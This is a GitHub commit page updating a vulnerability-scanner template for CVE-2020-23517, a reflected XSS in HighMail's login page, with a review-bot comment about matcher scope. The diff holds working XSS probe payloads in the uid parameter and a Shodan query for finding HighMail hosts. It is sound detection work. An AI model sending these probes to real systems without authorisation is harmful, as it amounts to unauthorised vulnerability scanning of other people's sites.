Update CVE-2020-23517.yaml

patch-1
Ritik Chaddha 2022-07-02 18:29:01 +05:30 committed by GitHub
parent df36c380cd
commit cfba4d0de9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 12 additions and 3 deletions


@ -13,21 +13,30 @@ info:
cvss-score: 6.1
cve-id: CVE-2020-23517
cwe-id: CWE-79
tags: xss,cve,cve2020
metadata:
verified: true
shodan-query: title:"HighMail"
tags: cve,cve2020,xss,cms,highmail
requests:
- method: GET
path:
- "{{BaseURL}}/login/?uid=\"><img%20src=\"x\"%20onerror=\"alert(%27XSS%27);\">"
- "{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- text/html
part: header
- type: word
words:
- "<img src=\"x\" onerror=\"alert('XSS')"
- 'value=""><script>alert(document.domain)</script>'
- type: status
status:
- 200
# Enhanced by mp on 2022/03/14
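Review bot: The word matcher that looks for the reflected string `value=""><script>alert(document.domain)</script>` carries no explicit `part`, while the `text/html` matcher next to it sets `part: header`. Adding `part: body` to the reflection matcher would state the intended scope instead of relying on the engine default, and would keep the two word matchers consistent. The rendered page has lost its +/- markers, so which payload and matcher lines are on the new side is inferred from the tag and metadata lines. The template's header (id, name, severity) lies above the hunk and was not reviewed.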